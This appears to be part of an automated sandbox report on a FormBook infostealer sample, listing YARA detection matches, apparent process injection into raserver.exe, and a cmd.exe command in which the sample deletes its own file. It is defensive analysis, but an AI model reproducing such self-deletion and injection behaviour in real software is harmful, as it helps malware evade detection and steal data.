                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000001.246218201.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000001.246218201.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000001.246218201.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      General

                                                                      Start time:18:04:38
                                                                      Start date:22/07/2021
                                                                      Path:C:\Windows\explorer.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\Explorer.EXE
                                                                      Imagebase:0x7ff693d90000
                                                                      File size:3933184 bytes
                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:18:05:00
                                                                      Start date:22/07/2021
                                                                      Path:C:\Windows\SysWOW64\raserver.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\raserver.exe
                                                                      Imagebase:0xeb0000
                                                                      File size:108544 bytes
                                                                      MD5 hash:2AADF65E395BFBD0D9B71D7279C8B5EC
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.508769679.0000000002FD0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.508769679.0000000002FD0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.508769679.0000000002FD0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.509446252.00000000032A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.509446252.00000000032A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.509446252.00000000032A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:moderate

                                                                      General

                                                                      Start time:18:05:05
                                                                      Start date:22/07/2021
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:/c del 'C:\Users\user\Desktop\pMbPS8nCm1.exe'
                                                                      Imagebase:0x150000
                                                                      File size:232960 bytes
                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:18:05:05
                                                                      Start date:22/07/2021
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7ecfc0000
                                                                      File size:625664 bytes
                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Disassembly

                                                                      Code Analysis

                                                                      Reset < >